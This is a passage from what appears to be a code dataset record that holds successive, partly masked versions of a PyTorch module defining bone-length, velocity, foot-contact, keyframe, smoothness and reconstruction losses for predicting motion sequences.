pos = predict_pos[:, i, :]\n loss = loss + (1 - t) * MSE_loss(pos, key_frame1\n ) + t * MSE_loss(pos, key_frame2)\n else:\n for i in range(self.key_num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame1)\n for i in range(num - self.key_num, num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame2)\n return loss * 2\n\n\nclass SmoothLoss(nn.Module):\n\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n init_root_pos = _train_x1[:, :1, self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n init_root_rot = _train_x1[:, :1, self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n root_pos_seq = predict_seq[..., self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n root_rot_seq = predict_seq[..., self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n last_root_pos = gt_seq[:, -1, self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n last_root_rot = gt_seq[:, -1, self.pos_dim + self.root_pos_dim:self\n .pos_dim + self.root_pos_dim + self.root_rot_dim]\n seq_num = len(root_pos_seq[0])\n batch_size = len(root_pos_seq)\n root_pos_item = torch.zeros([]).to(self.device)\n root_rot_item = torch.zeros([]).to(self.device)\n MSE_loss = nn.MSELoss()\n for idx in range(seq_num):\n if idx == 0:\n root_pos_temp = MSE_loss(root_pos_seq[:, :1, :],\n init_root_pos[:])\n root_rot_temp = MSE_loss(root_rot_seq[:, :1, :],\n init_root_rot[:])\n elif idx == seq_num - 1:\n 
root_pos_temp = MSE_loss(root_pos_seq[:, idx, :], last_root_pos\n ) + MSE_loss(root_pos_seq[:, idx - 1, :], last_root_pos)\n root_rot_temp = MSE_loss(root_rot_seq[:, idx, :], last_root_rot\n ) + MSE_loss(root_rot_seq[:, idx - 1, :], last_root_rot)\n else:\n root_pos_temp = torch.sum(torch.pow(root_pos_seq[:, idx, :] -\n root_pos_seq[:, idx - 1, :], 2)) / batch_size / seq_num\n root_rot_temp = torch.sum(torch.pow(root_rot_seq[:, idx, :] -\n root_rot_seq[:, idx - 1, :], 2)) / batch_size / seq_num\n root_pos_item = root_pos_item + root_pos_temp\n root_rot_item = root_rot_item + root_rot_temp\n loss = root_pos_item + root_rot_item\n return loss * 1.5\n",
"step-2": "<mask token>\n\n\nclass BoneLoss(nn.Module):\n\n def __init__(self, gt_bone_length, parents, _mean, _std, config):\n super(BoneLoss, self).__init__()\n self.gt_bone_length = gt_bone_length\n self.parents = parents\n self._mean = _mean\n self._std = _std\n self.device = config.device\n self.pos_dim = config.pos_dim\n <mask token>\n\n def forward(self, predict_seq, _train_x1, _train_x2):\n train_bone_length = self.calculate_bone_length_for_seq(predict_seq)\n _, gt_bone_length = torch.broadcast_tensors(train_bone_length, self\n .gt_bone_length)\n MSE_loss = nn.MSELoss()\n bone_loss = MSE_loss(train_bone_length, gt_bone_length)\n return bone_loss * 2\n\n\nclass VelocityLoss(nn.Module):\n\n def __init__(self, _mean, _std, config):\n super(VelocityLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.velocity_dim = config.velocity_dim\n self.vel_factor_dim = config.vel_factor_dim\n\n def calculate_velocity(self, src_pos_seq, src_init_pos):\n \"\"\"\n :param pos_seq: the position of predict sequence [Batch_size, seq_length, J * 3]\n :param init_pos: the position of initial frame\n :return:\n \"\"\"\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1),\n src_pos_seq), 1)\n velocity = temp_positions[:, 1:] - temp_positions[:, :-1]\n return velocity\n\n def get_vel_factor(self, velocity):\n batch_size = velocity.shape[0]\n seq_len = velocity.shape[1]\n joint_num = int(velocity.shape[-1] / 3)\n weight = [1, 2, 3, 4, 1, 2, 3, 4, 1, 1, 1, 1, 1, 1, 2, 3, 4, 1, 2, \n 3, 4, 1, 2, 1]\n parts = [1, 1, 1, 1, 2, 2, 2, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 4, 4, 4,\n 4, 0, 0, 0]\n weight_sum = []\n for part in range(5):\n p_sum = 0\n for j in range(joint_num):\n if parts[j] == part:\n p_sum += weight[j]\n weight_sum.append(p_sum)\n vel_factor = torch.empty((batch_size, seq_len, self.vel_factor_dim),\n dtype=torch.float32).to(self.device)\n for i in range(seq_len):\n factor = torch.zeros((batch_size, self.vel_factor_dim), dtype=\n torch.float32).to(self.device)\n for part in range(5):\n for j in range(joint_num):\n if parts[j] == part:\n factor[:, part:part + 1] = factor[:, part:part + 1\n ] + weight[j] / weight_sum[part] * pow(pow(\n velocity[:, i:i + 1, j * 3], 2) + pow(velocity[\n :, i:i + 1, j * 3 + 1], 2) + pow(velocity[:, i:\n i + 1, j * 3 + 2], 2), 0.5)\n vel_factor[:, i, :] = factor\n return vel_factor\n\n def forward(self, predict_seq, _train_x1, _train_x2, _true_vel_factor):\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = predict_seq[..., :self.pos_dim + self.root_pos_dim\n ] * self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:\n self.pos_dim + self.root_pos_dim]\n src_init_pos = init_pos * self._std[:self.pos_dim + self.root_pos_dim\n ] + self._mean[:self.pos_dim + self.root_pos_dim]\n train_velocity = self.calculate_velocity(src_pos_seq, src_init_pos)\n _train_velocity = (train_velocity - self._mean[-(self.velocity_dim +\n self.vel_factor_dim):-self.vel_factor_dim]) / self._std[-(self.\n velocity_dim + self.vel_factor_dim):-self.vel_factor_dim]\n train_vel_factor = self.get_vel_factor(train_velocity)\n _train_vel_factor = (train_vel_factor - self._mean[-self.\n vel_factor_dim:]) / self._std[-self.vel_factor_dim:]\n MSE_loss = nn.MSELoss()\n zero_seq = torch.zeros(predict_seq[:, 0, -self.velocity_dim:].shape\n ).to(self.device)\n loss1 = MSE_loss(predict_seq[:, 1:, -self.velocity_dim:],\n _train_velocity[:, 1:, :]) * 10 + 
MSE_loss(predict_seq[:, 0, -\n self.velocity_dim:], zero_seq) * 20\n loss2 = MSE_loss(_true_vel_factor[:, 1:-1, :], _train_vel_factor[:,\n 1:, :]) * 10\n velocity_loss = loss1 * 2 + loss2 * 1.5\n return velocity_loss\n\n\nclass ContactLoss(nn.Module):\n\n def __init__(self, _mean, _std, config):\n super(ContactLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.contact_dim = config.contact_dim\n self.velocity_dim = config.velocity_dim\n self.left_feet = config.left_foot\n self.right_feet = config.right_foot\n self.vel_factor_dim = config.vel_factor_dim\n self.contact_loc = (self.contact_dim + self.velocity_dim + self.\n vel_factor_dim)\n\n def calculate_foot_vels(self, src_pos_seq, src_init_pos, left_foot,\n right_foot):\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1),\n src_pos_seq), 1)\n left_foot0_vel = (temp_positions[:, 1:, left_foot[0] * 3:left_foot[\n 0] * 3 + 3] - temp_positions[:, :-1, left_foot[0] * 3:left_foot\n [0] * 3 + 3]) ** 2\n left_foot0_vel = torch.sum(left_foot0_vel, -1, keepdim=True)\n left_foot1_vel = (temp_positions[:, 1:, left_foot[1] * 3:left_foot[\n 1] * 3 + 3] - temp_positions[:, :-1, left_foot[1] * 3:left_foot\n [1] * 3 + 3]) ** 2\n left_foot1_vel = torch.sum(left_foot1_vel, -1, keepdim=True)\n right_foot0_vel = (temp_positions[:, 1:, right_foot[0] * 3:\n right_foot[0] * 3 + 3] - temp_positions[:, :-1, right_foot[0] *\n 3:right_foot[0] * 3 + 3]) ** 2\n right_foot0_vel = torch.sum(right_foot0_vel, -1, keepdim=True)\n right_foot1_vel = (temp_positions[:, 1:, right_foot[1] * 3:\n right_foot[1] * 3 + 3] - temp_positions[:, :-1, right_foot[1] *\n 3:right_foot[1] * 3 + 3]) ** 2\n right_foot1_vel = torch.sum(right_foot1_vel, -1, keepdim=True)\n feet_vel = torch.cat((left_foot0_vel, left_foot1_vel,\n right_foot0_vel, right_foot1_vel), -1)\n return feet_vel\n\n def forward(self, predict_seq, _train_x1, _train_x2):\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = predict_seq[..., :self.pos_dim + self.root_pos_dim\n ] * self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:\n self.pos_dim + self.root_pos_dim]\n src_init_pos = init_pos * self._std[:self.pos_dim + self.root_pos_dim\n ] + self._mean[:self.pos_dim + self.root_pos_dim]\n feet_vels = self.calculate_foot_vels(src_pos_seq, src_init_pos,\n self.left_feet, self.right_feet)\n feet_contact = torch.abs(predict_seq[..., -(self.contact_dim + self\n .velocity_dim):-self.velocity_dim] * self._std[-self.\n contact_loc:-(self.velocity_dim + self.vel_factor_dim)] + self.\n _mean[-self.contact_loc:-(self.velocity_dim + self.vel_factor_dim)]\n )\n contact_loss = torch.mean(torch.sum(torch.sum(feet_contact *\n feet_vels, dim=-1), dim=-1))\n return contact_loss * 2\n\n\nclass KeyframeLoss(nn.Module):\n\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n self.key_num = config.key_num\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n key_frame1 = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim +\n self.root_rot_dim]\n key_frame2 = gt_seq[:, -1, :self.pos_dim + self.root_pos_dim + self\n .root_rot_dim]\n predict_pos = predict_seq[:, :, :self.pos_dim + self.root_pos_dim +\n self.root_rot_dim]\n num = predict_pos.shape[1]\n MSE_loss = nn.MSELoss()\n loss = torch.zeros([]).to(self.device)\n if num <= self.key_num * 2:\n for i in range(num):\n 
t = (i + 1) / (num + 1)\n pos = predict_pos[:, i, :]\n loss = loss + (1 - t) * MSE_loss(pos, key_frame1\n ) + t * MSE_loss(pos, key_frame2)\n else:\n for i in range(self.key_num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame1)\n for i in range(num - self.key_num, num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame2)\n return loss * 2\n\n\nclass SmoothLoss(nn.Module):\n\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n init_root_pos = _train_x1[:, :1, self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n init_root_rot = _train_x1[:, :1, self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n root_pos_seq = predict_seq[..., self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n root_rot_seq = predict_seq[..., self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n last_root_pos = gt_seq[:, -1, self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n last_root_rot = gt_seq[:, -1, self.pos_dim + self.root_pos_dim:self\n .pos_dim + self.root_pos_dim + self.root_rot_dim]\n seq_num = len(root_pos_seq[0])\n batch_size = len(root_pos_seq)\n root_pos_item = torch.zeros([]).to(self.device)\n root_rot_item = torch.zeros([]).to(self.device)\n MSE_loss = nn.MSELoss()\n for idx in range(seq_num):\n if idx == 0:\n root_pos_temp = MSE_loss(root_pos_seq[:, :1, :],\n init_root_pos[:])\n root_rot_temp = MSE_loss(root_rot_seq[:, :1, :],\n init_root_rot[:])\n elif idx == seq_num - 1:\n root_pos_temp = MSE_loss(root_pos_seq[:, idx, :], last_root_pos\n ) + MSE_loss(root_pos_seq[:, idx - 1, :], last_root_pos)\n root_rot_temp = MSE_loss(root_rot_seq[:, idx, :], last_root_rot\n ) + MSE_loss(root_rot_seq[:, idx - 1, :], last_root_rot)\n else:\n root_pos_temp = torch.sum(torch.pow(root_pos_seq[:, idx, :] -\n root_pos_seq[:, idx - 1, :], 2)) / batch_size / seq_num\n root_rot_temp = torch.sum(torch.pow(root_rot_seq[:, idx, :] -\n root_rot_seq[:, idx - 1, :], 2)) / batch_size / seq_num\n root_pos_item = root_pos_item + root_pos_temp\n root_rot_item = root_rot_item + root_rot_temp\n loss = root_pos_item + root_rot_item\n return loss * 1.5\n",
"step-3": "<mask token>\n\n\nclass BoneLoss(nn.Module):\n\n def __init__(self, gt_bone_length, parents, _mean, _std, config):\n super(BoneLoss, self).__init__()\n self.gt_bone_length = gt_bone_length\n self.parents = parents\n self._mean = _mean\n self._std = _std\n self.device = config.device\n self.pos_dim = config.pos_dim\n\n def calculate_bone_length_for_seq(self, seq):\n src_seq = seq[..., :self.pos_dim] * self._std[:self.pos_dim\n ] + self._mean[:self.pos_dim]\n new_seq = src_seq.view(src_seq.shape[0], src_seq.shape[1], int(\n src_seq.shape[2] / 3), 3)\n root_pos = torch.tensor([[0, 0, 0]], dtype=torch.float32).to(self.\n device)\n root_positions = torch.unsqueeze(torch.unsqueeze(root_pos, 0), 0)\n root_positions = root_positions.repeat(src_seq.shape[0], src_seq.\n shape[1], 1, 1)\n positions = torch.cat((root_positions, new_seq), 2)\n result_list = torch.empty((src_seq.shape[0], src_seq.shape[1], int(\n src_seq.shape[2] / 3)), dtype=torch.float32).to(self.device)\n index = 0\n for joint, parent in enumerate(self.parents):\n if parent == -1:\n continue\n joint_pos = positions[:, :, joint]\n parent_pos = positions[:, :, parent]\n delta_x = joint_pos[..., 0] - parent_pos[..., 0]\n delta_y = joint_pos[..., 1] - parent_pos[..., 1]\n delta_z = joint_pos[..., 2] - parent_pos[..., 2]\n length_temp = (delta_x ** 2 + delta_y ** 2 + delta_z ** 2) ** 0.5\n result_list[..., index] = length_temp\n index += 1\n return result_list\n\n def forward(self, predict_seq, _train_x1, _train_x2):\n train_bone_length = self.calculate_bone_length_for_seq(predict_seq)\n _, gt_bone_length = torch.broadcast_tensors(train_bone_length, self\n .gt_bone_length)\n MSE_loss = nn.MSELoss()\n bone_loss = MSE_loss(train_bone_length, gt_bone_length)\n return bone_loss * 2\n\n\nclass VelocityLoss(nn.Module):\n\n def __init__(self, _mean, _std, config):\n super(VelocityLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.velocity_dim = config.velocity_dim\n self.vel_factor_dim = config.vel_factor_dim\n\n def calculate_velocity(self, src_pos_seq, src_init_pos):\n \"\"\"\n :param pos_seq: the position of predict sequence [Batch_size, seq_length, J * 3]\n :param init_pos: the position of initial frame\n :return:\n \"\"\"\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1),\n src_pos_seq), 1)\n velocity = temp_positions[:, 1:] - temp_positions[:, :-1]\n return velocity\n\n def get_vel_factor(self, velocity):\n batch_size = velocity.shape[0]\n seq_len = velocity.shape[1]\n joint_num = int(velocity.shape[-1] / 3)\n weight = [1, 2, 3, 4, 1, 2, 3, 4, 1, 1, 1, 1, 1, 1, 2, 3, 4, 1, 2, \n 3, 4, 1, 2, 1]\n parts = [1, 1, 1, 1, 2, 2, 2, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 4, 4, 4,\n 4, 0, 0, 0]\n weight_sum = []\n for part in range(5):\n p_sum = 0\n for j in range(joint_num):\n if parts[j] == part:\n p_sum += weight[j]\n weight_sum.append(p_sum)\n vel_factor = torch.empty((batch_size, seq_len, self.vel_factor_dim),\n dtype=torch.float32).to(self.device)\n for i in range(seq_len):\n factor = torch.zeros((batch_size, self.vel_factor_dim), dtype=\n torch.float32).to(self.device)\n for part in range(5):\n for j in range(joint_num):\n if parts[j] == part:\n factor[:, part:part + 1] = factor[:, part:part + 1\n ] + weight[j] / weight_sum[part] * pow(pow(\n velocity[:, i:i + 1, j * 3], 2) + pow(velocity[\n :, i:i + 1, j * 3 + 1], 2) + pow(velocity[:, i:\n i + 1, j * 3 + 2], 2), 0.5)\n vel_factor[:, i, :] = factor\n 
return vel_factor\n\n def forward(self, predict_seq, _train_x1, _train_x2, _true_vel_factor):\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = predict_seq[..., :self.pos_dim + self.root_pos_dim\n ] * self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:\n self.pos_dim + self.root_pos_dim]\n src_init_pos = init_pos * self._std[:self.pos_dim + self.root_pos_dim\n ] + self._mean[:self.pos_dim + self.root_pos_dim]\n train_velocity = self.calculate_velocity(src_pos_seq, src_init_pos)\n _train_velocity = (train_velocity - self._mean[-(self.velocity_dim +\n self.vel_factor_dim):-self.vel_factor_dim]) / self._std[-(self.\n velocity_dim + self.vel_factor_dim):-self.vel_factor_dim]\n train_vel_factor = self.get_vel_factor(train_velocity)\n _train_vel_factor = (train_vel_factor - self._mean[-self.\n vel_factor_dim:]) / self._std[-self.vel_factor_dim:]\n MSE_loss = nn.MSELoss()\n zero_seq = torch.zeros(predict_seq[:, 0, -self.velocity_dim:].shape\n ).to(self.device)\n loss1 = MSE_loss(predict_seq[:, 1:, -self.velocity_dim:],\n _train_velocity[:, 1:, :]) * 10 + MSE_loss(predict_seq[:, 0, -\n self.velocity_dim:], zero_seq) * 20\n loss2 = MSE_loss(_true_vel_factor[:, 1:-1, :], _train_vel_factor[:,\n 1:, :]) * 10\n velocity_loss = loss1 * 2 + loss2 * 1.5\n return velocity_loss\n\n\nclass ContactLoss(nn.Module):\n\n def __init__(self, _mean, _std, config):\n super(ContactLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.contact_dim = config.contact_dim\n self.velocity_dim = config.velocity_dim\n self.left_feet = config.left_foot\n self.right_feet = config.right_foot\n self.vel_factor_dim = config.vel_factor_dim\n self.contact_loc = (self.contact_dim + self.velocity_dim + self.\n vel_factor_dim)\n\n def calculate_foot_vels(self, src_pos_seq, src_init_pos, left_foot,\n right_foot):\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1),\n src_pos_seq), 1)\n left_foot0_vel = (temp_positions[:, 1:, left_foot[0] * 3:left_foot[\n 0] * 3 + 3] - temp_positions[:, :-1, left_foot[0] * 3:left_foot\n [0] * 3 + 3]) ** 2\n left_foot0_vel = torch.sum(left_foot0_vel, -1, keepdim=True)\n left_foot1_vel = (temp_positions[:, 1:, left_foot[1] * 3:left_foot[\n 1] * 3 + 3] - temp_positions[:, :-1, left_foot[1] * 3:left_foot\n [1] * 3 + 3]) ** 2\n left_foot1_vel = torch.sum(left_foot1_vel, -1, keepdim=True)\n right_foot0_vel = (temp_positions[:, 1:, right_foot[0] * 3:\n right_foot[0] * 3 + 3] - temp_positions[:, :-1, right_foot[0] *\n 3:right_foot[0] * 3 + 3]) ** 2\n right_foot0_vel = torch.sum(right_foot0_vel, -1, keepdim=True)\n right_foot1_vel = (temp_positions[:, 1:, right_foot[1] * 3:\n right_foot[1] * 3 + 3] - temp_positions[:, :-1, right_foot[1] *\n 3:right_foot[1] * 3 + 3]) ** 2\n right_foot1_vel = torch.sum(right_foot1_vel, -1, keepdim=True)\n feet_vel = torch.cat((left_foot0_vel, left_foot1_vel,\n right_foot0_vel, right_foot1_vel), -1)\n return feet_vel\n\n def forward(self, predict_seq, _train_x1, _train_x2):\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = predict_seq[..., :self.pos_dim + self.root_pos_dim\n ] * self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:\n self.pos_dim + self.root_pos_dim]\n src_init_pos = init_pos * self._std[:self.pos_dim + self.root_pos_dim\n ] + self._mean[:self.pos_dim + self.root_pos_dim]\n feet_vels = self.calculate_foot_vels(src_pos_seq, src_init_pos,\n self.left_feet, self.right_feet)\n feet_contact = 
torch.abs(predict_seq[..., -(self.contact_dim + self\n .velocity_dim):-self.velocity_dim] * self._std[-self.\n contact_loc:-(self.velocity_dim + self.vel_factor_dim)] + self.\n _mean[-self.contact_loc:-(self.velocity_dim + self.vel_factor_dim)]\n )\n contact_loss = torch.mean(torch.sum(torch.sum(feet_contact *\n feet_vels, dim=-1), dim=-1))\n return contact_loss * 2\n\n\nclass KeyframeLoss(nn.Module):\n\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n self.key_num = config.key_num\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n key_frame1 = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim +\n self.root_rot_dim]\n key_frame2 = gt_seq[:, -1, :self.pos_dim + self.root_pos_dim + self\n .root_rot_dim]\n predict_pos = predict_seq[:, :, :self.pos_dim + self.root_pos_dim +\n self.root_rot_dim]\n num = predict_pos.shape[1]\n MSE_loss = nn.MSELoss()\n loss = torch.zeros([]).to(self.device)\n if num <= self.key_num * 2:\n for i in range(num):\n t = (i + 1) / (num + 1)\n pos = predict_pos[:, i, :]\n loss = loss + (1 - t) * MSE_loss(pos, key_frame1\n ) + t * MSE_loss(pos, key_frame2)\n else:\n for i in range(self.key_num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame1)\n for i in range(num - self.key_num, num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame2)\n return loss * 2\n\n\nclass SmoothLoss(nn.Module):\n\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n init_root_pos = _train_x1[:, :1, self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n init_root_rot = _train_x1[:, :1, self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n root_pos_seq = predict_seq[..., self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n root_rot_seq = predict_seq[..., self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n last_root_pos = gt_seq[:, -1, self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n last_root_rot = gt_seq[:, -1, self.pos_dim + self.root_pos_dim:self\n .pos_dim + self.root_pos_dim + self.root_rot_dim]\n seq_num = len(root_pos_seq[0])\n batch_size = len(root_pos_seq)\n root_pos_item = torch.zeros([]).to(self.device)\n root_rot_item = torch.zeros([]).to(self.device)\n MSE_loss = nn.MSELoss()\n for idx in range(seq_num):\n if idx == 0:\n root_pos_temp = MSE_loss(root_pos_seq[:, :1, :],\n init_root_pos[:])\n root_rot_temp = MSE_loss(root_rot_seq[:, :1, :],\n init_root_rot[:])\n elif idx == seq_num - 1:\n root_pos_temp = MSE_loss(root_pos_seq[:, idx, :], last_root_pos\n ) + MSE_loss(root_pos_seq[:, idx - 1, :], last_root_pos)\n root_rot_temp = MSE_loss(root_rot_seq[:, idx, :], last_root_rot\n ) + MSE_loss(root_rot_seq[:, idx - 1, :], last_root_rot)\n else:\n root_pos_temp = torch.sum(torch.pow(root_pos_seq[:, idx, :] -\n root_pos_seq[:, idx - 1, :], 2)) / batch_size / seq_num\n root_rot_temp = torch.sum(torch.pow(root_rot_seq[:, idx, :] -\n root_rot_seq[:, idx - 1, :], 2)) / batch_size / seq_num\n root_pos_item = root_pos_item + root_pos_temp\n root_rot_item = root_rot_item + root_rot_temp\n loss = root_pos_item + root_rot_item\n return loss * 1.5\n",
"step-4": "import torch\nimport torch.nn as nn\n\n\nclass ReconstructionLoss(nn.Module):\n\n def __init__(self, config):\n super(ReconstructionLoss, self).__init__()\n self.velocity_dim = config.velocity_dim\n\n def forward(self, pre_seq, gt_seq):\n MSE_loss = nn.MSELoss()\n rec_loss = MSE_loss(pre_seq[:, 1:-1, :], gt_seq[:, 1:-1, :]\n ) + MSE_loss(pre_seq[:, -1, :], gt_seq[:, -1, :]) + MSE_loss(\n pre_seq[:, 0, :-self.velocity_dim], gt_seq[:, 0, :-self.\n velocity_dim])\n return rec_loss * 3\n\n\nclass BoneLoss(nn.Module):\n\n def __init__(self, gt_bone_length, parents, _mean, _std, config):\n super(BoneLoss, self).__init__()\n self.gt_bone_length = gt_bone_length\n self.parents = parents\n self._mean = _mean\n self._std = _std\n self.device = config.device\n self.pos_dim = config.pos_dim\n\n def calculate_bone_length_for_seq(self, seq):\n src_seq = seq[..., :self.pos_dim] * self._std[:self.pos_dim\n ] + self._mean[:self.pos_dim]\n new_seq = src_seq.view(src_seq.shape[0], src_seq.shape[1], int(\n src_seq.shape[2] / 3), 3)\n root_pos = torch.tensor([[0, 0, 0]], dtype=torch.float32).to(self.\n device)\n root_positions = torch.unsqueeze(torch.unsqueeze(root_pos, 0), 0)\n root_positions = root_positions.repeat(src_seq.shape[0], src_seq.\n shape[1], 1, 1)\n positions = torch.cat((root_positions, new_seq), 2)\n result_list = torch.empty((src_seq.shape[0], src_seq.shape[1], int(\n src_seq.shape[2] / 3)), dtype=torch.float32).to(self.device)\n index = 0\n for joint, parent in enumerate(self.parents):\n if parent == -1:\n continue\n joint_pos = positions[:, :, joint]\n parent_pos = positions[:, :, parent]\n delta_x = joint_pos[..., 0] - parent_pos[..., 0]\n delta_y = joint_pos[..., 1] - parent_pos[..., 1]\n delta_z = joint_pos[..., 2] - parent_pos[..., 2]\n length_temp = (delta_x ** 2 + delta_y ** 2 + delta_z ** 2) ** 0.5\n result_list[..., index] = length_temp\n index += 1\n return result_list\n\n def forward(self, predict_seq, _train_x1, _train_x2):\n train_bone_length = self.calculate_bone_length_for_seq(predict_seq)\n _, gt_bone_length = torch.broadcast_tensors(train_bone_length, self\n .gt_bone_length)\n MSE_loss = nn.MSELoss()\n bone_loss = MSE_loss(train_bone_length, gt_bone_length)\n return bone_loss * 2\n\n\nclass VelocityLoss(nn.Module):\n\n def __init__(self, _mean, _std, config):\n super(VelocityLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.velocity_dim = config.velocity_dim\n self.vel_factor_dim = config.vel_factor_dim\n\n def calculate_velocity(self, src_pos_seq, src_init_pos):\n \"\"\"\n :param pos_seq: the position of predict sequence [Batch_size, seq_length, J * 3]\n :param init_pos: the position of initial frame\n :return:\n \"\"\"\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1),\n src_pos_seq), 1)\n velocity = temp_positions[:, 1:] - temp_positions[:, :-1]\n return velocity\n\n def get_vel_factor(self, velocity):\n batch_size = velocity.shape[0]\n seq_len = velocity.shape[1]\n joint_num = int(velocity.shape[-1] / 3)\n weight = [1, 2, 3, 4, 1, 2, 3, 4, 1, 1, 1, 1, 1, 1, 2, 3, 4, 1, 2, \n 3, 4, 1, 2, 1]\n parts = [1, 1, 1, 1, 2, 2, 2, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 4, 4, 4,\n 4, 0, 0, 0]\n weight_sum = []\n for part in range(5):\n p_sum = 0\n for j in range(joint_num):\n if parts[j] == part:\n p_sum += weight[j]\n weight_sum.append(p_sum)\n vel_factor = torch.empty((batch_size, seq_len, self.vel_factor_dim),\n 
dtype=torch.float32).to(self.device)\n for i in range(seq_len):\n factor = torch.zeros((batch_size, self.vel_factor_dim), dtype=\n torch.float32).to(self.device)\n for part in range(5):\n for j in range(joint_num):\n if parts[j] == part:\n factor[:, part:part + 1] = factor[:, part:part + 1\n ] + weight[j] / weight_sum[part] * pow(pow(\n velocity[:, i:i + 1, j * 3], 2) + pow(velocity[\n :, i:i + 1, j * 3 + 1], 2) + pow(velocity[:, i:\n i + 1, j * 3 + 2], 2), 0.5)\n vel_factor[:, i, :] = factor\n return vel_factor\n\n def forward(self, predict_seq, _train_x1, _train_x2, _true_vel_factor):\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = predict_seq[..., :self.pos_dim + self.root_pos_dim\n ] * self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:\n self.pos_dim + self.root_pos_dim]\n src_init_pos = init_pos * self._std[:self.pos_dim + self.root_pos_dim\n ] + self._mean[:self.pos_dim + self.root_pos_dim]\n train_velocity = self.calculate_velocity(src_pos_seq, src_init_pos)\n _train_velocity = (train_velocity - self._mean[-(self.velocity_dim +\n self.vel_factor_dim):-self.vel_factor_dim]) / self._std[-(self.\n velocity_dim + self.vel_factor_dim):-self.vel_factor_dim]\n train_vel_factor = self.get_vel_factor(train_velocity)\n _train_vel_factor = (train_vel_factor - self._mean[-self.\n vel_factor_dim:]) / self._std[-self.vel_factor_dim:]\n MSE_loss = nn.MSELoss()\n zero_seq = torch.zeros(predict_seq[:, 0, -self.velocity_dim:].shape\n ).to(self.device)\n loss1 = MSE_loss(predict_seq[:, 1:, -self.velocity_dim:],\n _train_velocity[:, 1:, :]) * 10 + MSE_loss(predict_seq[:, 0, -\n self.velocity_dim:], zero_seq) * 20\n loss2 = MSE_loss(_true_vel_factor[:, 1:-1, :], _train_vel_factor[:,\n 1:, :]) * 10\n velocity_loss = loss1 * 2 + loss2 * 1.5\n return velocity_loss\n\n\nclass ContactLoss(nn.Module):\n\n def __init__(self, _mean, _std, config):\n super(ContactLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.contact_dim = config.contact_dim\n self.velocity_dim = config.velocity_dim\n self.left_feet = config.left_foot\n 